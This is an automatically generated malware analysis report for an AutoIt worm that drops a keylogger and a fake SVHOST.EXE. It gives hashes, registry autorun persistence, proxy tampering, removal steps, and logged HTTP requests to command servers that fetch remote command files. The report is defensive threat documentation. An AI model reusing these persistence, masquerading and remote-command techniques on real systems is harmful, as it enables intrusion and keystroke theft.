Trojan.Win32.Agent.wi (Kaspersky), Worm.Win32.AutoIt.FD, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Trojan, Worm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 76d056eab6a7a297f4115d32d7e3fff0
SHA1: 7b35cc6a7747abb090f34c5d3df98bb90461dae8
SHA256: 2583440d195e0e4caa830e0107b5164bf2f3cab10d7873ef4544ec5c2e708a4c
SSDeep: 196608:k5pKc849z9DyR6XUEW6LZNQ3AWkaoNDGrj0fU4EDRw57qc55t:qv9z9Dy4kEvrEA1ai4j6Si7zD
Size: 8875961 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: LCCWin32v1x, UPolyXv05_v6
Company: no certificate found
Created at: 2000-06-12 06:19:17
Analyzed on: Windows7 SP1 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Worm creates the following process(es):
%original file name%.exe:3676
SVHOST.EXE:3172
IDMSETUP.EXE:3148
KEYLOG.EXE:2452
rundll32.exe:1948
SETUP.EXE:3400
The Worm injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3676 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Windows\System32\SETUP.EXE (1365 bytes)
C:\Windows\System32\KEYLOG.EXE (1980 bytes)
The process SVHOST.EXE:3172 makes changes in the file system.
The Worm deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\lenh[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\lenh[1].txt (0 bytes)
The process IDMSETUP.EXE:3148 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp (187 bytes)
The process KEYLOG.EXE:2452 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\Desktop\Log.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KEYLOG.EXE.lnk (865 bytes)
The process rundll32.exe:1948 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O0QB1JLE\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\Y2WOAHMS\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\T3K3S2QD\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VQ5LGSJU\desktop.ini (67 bytes)
The process SETUP.EXE:3400 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Windows\System32\IDMSETUP.EXE (1024 bytes)
C:\Windows\System32\SVHOST.EXE (1897 bytes)
Registry activity
The process %original file name%.exe:3676 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Worm deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process SVHOST.EXE:3172 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe" = "C:\Windows\wupdate.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process SETUP.EXE:3400 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Worm deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
Dropped PE files
MD5 | File path |
---|---|
856c5491185c204f8eeebce105209152 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp |
09959ee223c5d34c82f1efb8bc8233cb | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM100.tmp |
8c317c051ce2b577005f5823baa26dfa | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM106.tmp |
3114bb1630e44cfbd48b09e0d6057c8f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM110.tmp |
f7f38ef34b96432c6a7f065a0a808084 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM111.tmp |
30e10c83a0f43363040fb3f58597f703 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM112.tmp |
a6954e742acd89ca29a0cd1cae6c2b8a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM113.tmp |
84f258c82af5622f8319fbe8d7c0e7fd | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM3.tmp |
50c2e62660c7c1d26c60d320cc61f8a6 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM35.tmp |
ef8b8abb7c22bca182ea727375d106d5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM36.tmp |
8733245b8d7a0038f46f65f945584e6f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM39.tmp |
b289c20c10b241f6016fecd92b267098 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM40.tmp |
86bbadce4d28c78b4d1dca68eba45795 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM45.tmp |
48db4bfce6f3476dfa6602546f5fb5d4 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM46.tmp |
0f555fac769f520afd9de03482fa9fe5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM49.tmp |
8746b95e9fdba64c983d57e1da8f10e5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM5.tmp |
bdc1f5bb43db8f10464c063370ddd2e7 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM52.tmp |
222bdccbf0debd6cac36b92836d7b190 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM53.tmp |
225126e6277282ba7141383b87ecdce4 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM54.tmp |
95e07bdfa650d761d3b607d154d06a66 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM55.tmp |
0ef1e8299f58e1369b067f7b65d9f773 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM56.tmp |
371f4360c226b82a12692d4cca9a8434 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM57.tmp |
f93cb9f9ad8a8e3919d40c96938a64af | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM66.tmp |
ac822be8ffb08e7ea2ad573b9f87ea71 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM67.tmp |
b06190af451b2037ff075aeb5d21e26f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM68.tmp |
724944dc515ac36a507e5b2edcd07c2a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM69.tmp |
8c6af35602856595601f3cffc70317d8 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM7.tmp |
c976ceb4be1daf3a848c11a4adf224ba | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM71.tmp |
ffa3d7e622959b301a234723d7d26782 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM72.tmp |
7d427d9ae90bcc3d22db138b9eb3ce65 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM73.tmp |
3b2574a4bcaab325288db198e4b9cae6 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM8.tmp |
f3a927a2118ad55ef562c1e943523142 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM88.tmp |
85d34e4f4eb601666c411645731e2bbf | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM92.tmp |
ef7ef937843c764025ab95d490565a81 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM94.tmp |
108e532aa2ebb668b11b0c87b1289204 | c:\Windows\System32\IDMSETUP.EXE |
ddd395ceded5836476b64da9acbeeaad | c:\Windows\System32\KEYLOG.EXE |
7ca0522e7ce22ba15e514b207c26ee9c | c:\Windows\System32\SETUP.EXE |
56d224011eb0a3beade972e1123701d3 | c:\Windows\System32\SVHOST.EXE |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3676
SVHOST.EXE:3172
IDMSETUP.EXE:3148
KEYLOG.EXE:2452
rundll32.exe:1948
SETUP.EXE:3400
- Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
C:\Windows\System32\SETUP.EXE (1365 bytes)
C:\Windows\System32\KEYLOG.EXE (1980 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp (187 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Log.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KEYLOG.EXE.lnk (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O0QB1JLE\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\Y2WOAHMS\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\T3K3S2QD\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VQ5LGSJU\desktop.ini (67 bytes)
C:\Windows\System32\IDMSETUP.EXE (1024 bytes)
C:\Windows\System32\SVHOST.EXE (1897 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe" = "C:\Windows\wupdate.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 2848 | 3072 | 4.07684 | f41d010ef3048c18a8afad0bffd69494 |
.bss | 8192 | 580 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 12288 | 104 | 512 | 2.16578 | 9529af9f59e0ccedfdfc324f0bf83531 |
.idata | 16384 | 986 | 1024 | 2.99033 | db2569361ee483d3ea15134abc0d84bd |
.rsrc | 20480 | 924 | 1024 | 2.39878 | 9cff17511d40ceaa4f6625a37b8f32af |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 11
Network Activity
URLs
URL | IP |
---|---|
hxxp://long.nhatnghe.vn/trojan.txt | 103.27.60.195 |
hxxp://cehlab.info/X/lenh.txt | 119.81.140.207 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /trojan.txt HTTP/1.1
User-Agent: AutoIt
Host: long.nhatnghe.vn
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 25 Feb 2017 17:00:03 GMT
Content-Length: 1245
<<< skipped >>>
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:27 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:32 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:38 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:43 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:49 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:54 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:59 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:15:05 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
Map
The Worm connects to the servers at the following location(s):
Strings from Dumps
KEYLOG.EXE_2452:
SVHOST.EXE_3172:
IDM1.tmp_1652:
SearchProtocolHost.exe_3196:
SearchFilterHost.exe_3036: